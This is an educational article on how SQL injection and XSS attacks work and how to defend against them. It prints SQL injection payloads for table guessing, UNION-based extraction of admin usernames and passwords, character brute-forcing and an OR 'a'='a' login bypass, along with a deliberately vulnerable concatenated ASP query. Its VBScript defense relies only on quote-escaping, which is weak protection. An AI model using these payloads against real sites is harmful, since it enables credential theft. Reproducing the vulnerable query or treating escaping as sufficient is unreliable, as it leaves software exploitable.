How Attackers Exploit SQL Injection and XSS – Techniques and Defenses

SQL injection occurs when an attacker inserts malicious SQL commands into web forms, URL parameters, or other input fields, causing the server to execute unintended queries; this often leads to credential leaks or full database compromise.

Typical exploitation steps include:

Guessing table names using payloads like AND (SELECT COUNT(*) FROM table_name)<>0.

Guessing column names with AND (SELECT COUNT(column_name) FROM table_name)<>0.

Using AND EXISTS (SELECT * FROM table_name) to confirm existence.

Leveraging error‑based techniques, e.g., AND user>0 to trigger conversion errors that reveal data.

Employing UNION‑based queries such as

ORDER BY 10 AND 1=2 UNION SELECT 1,2,3,user,passwd FROM admin

to extract column values.

Performing ASCII‑brute‑force attacks by iteratively checking character codes, e.g., AND (SELECT TOP 1 ASC(MID(user,1,1)) FROM admin)>100, to reconstruct strings like usernames and passwords.

Backend authentication bypass often relies on logical flaws such as using OR 'a'='a' in the username or password fields, turning the condition into a universally true statement. For the bypass to succeed, the vulnerable code must combine username and password checks in a single SQL statement and the password must be stored in plain text or an easily guessable form.

Example of vulnerable code:

user = request("user")
passwd = request("passwd")
sql = "select admin from adminbate where user='" & user & "' and passwd='" & passwd & "'"

By submitting or 'a'='a as the username and password, the query becomes always true, granting unauthorized access.

Defensive measures include input sanitization and the use of a safe request function that validates parameter types and escapes single quotes. A typical implementation in VBScript:

Function SafeRequest(ParaName, ParaType)   'ParaName: parameter name, ParaType: 1 for numeric, 0 for string
    Dim ParaValue
    ParaValue = Request(ParaName)
    If ParaType = 1 Then
        If Not IsNumeric(ParaValue) Then
            Response.Write "Parameter " & ParaName & " must be numeric!"
            Response.End
        End If
    Else
        ParaValue = Replace(ParaValue, "'", "''")
    End If
    SafeRequest = ParaValue
End Function

All user inputs should be passed through SafeRequest() before being incorporated into SQL statements.

XSS (Cross‑Site Scripting) is another web‑application threat where attackers inject malicious HTML/JavaScript into pages viewed by victims. The article briefly outlines internal vs. external XSS vectors and mentions using crafted XSS pages to steal cookies or execute shell commands, noting that while the technique is dated, understanding it helps improve overall security posture.